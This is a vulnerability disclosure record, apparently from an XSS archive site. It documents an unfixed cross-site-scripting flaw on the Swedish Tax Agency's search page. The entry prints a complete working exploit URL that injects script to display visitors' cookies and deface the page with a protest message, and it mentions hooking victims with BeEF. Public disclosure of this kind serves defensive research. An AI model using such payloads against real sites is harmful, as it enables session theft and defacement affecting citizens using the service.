| 
 
| Security researcher DellNull, has submitted on 15/05/2009 a cross-site-scripting (XSS) vulnerability affecting www.skatteverket.se, which at the time of submission ranked 17998 on the web according to Alexa. We manually validated and published a mirror of this vulnerability on 21/11/2010. It is currently unfixed.
 If you believe that this security issue has been corrected, please send us an e-mail.
 |  
              | Date submitted: 15/05/2009 | Date published: 21/11/2010 | Fixed? Mail us! | Status:  UNFIXED |  
| Author: DellNull | Domain: www.skatteverket.se | Category: XSS | Pagerank: 17998 | 
|---|
 
 
| URL: http://www.skatteverket.se/funktioner/sok/sok.4.5732cd2411150a57de580004325.html?sv.search.query.all words=%3CSCRIPT%3E%3C%2FSCRIPT%3E%3CSCRIPT%3Ealert(%27This+is+a+cookie+from+the+Swedish+National+Tax
 +Board!\n%27%2Bdocument.cookie)%3B%3C%2FSCRIPT%3E%3Ch1%3E%3Cfont+color%3D%22red%22+size%3D%22%2B5%22
 %3EThe+Swedish+National+Tax+Board!+%3Cbr%3E+You+take+more+than+47%25+of+peoples+income+as+burden+of+
 taxation.+I%27m+sure+not+a+penny+of+that+is+invested+in+security%2C+see+%3Ca+href+%3D%27http%3A%2F%2
 Fxssed.com%2Fsearch%3Fkey%3Dskatteverket.se%27%3Ehttp%3A%2F%2Fxssed.com%2Fsearch%3Fkey%3Dskatteverke
 t.se%3C%2Fa%3E+It%27s+a+shame+that+a+government+authority+that+handles+sensitive+record+about+swedis
 h+citizens+is+prone+to+security+flaws+in+their+systems!+What+if+someone+places+a+xss+proxy+hook+(lik
 e+BeEF)+here%3F+The+privacy+for+swedish+citizens+is+supposed+to+be+protected+by+constitutional+laws.
 +So+live+by+the+law+or+die+by+the+law%3Cbr%3E%3Cbr%3E-+DellNull%3Cbr%3E%3Cbr%3E%3Cbr%3E%3Cimg+src%3D
 %27http%3A%2F%2Ftreesflowersbirds.files.wordpress.com%2F2009%2F02%2Ftax-collector.jpg%27%3E%3C%2Ffon
 t%3E%3C%2Fh1%3E&submit=S%C3%B6k&sv.search.hits.startonhit=0
 |  
| Click here to view the mirror |  
|  |  |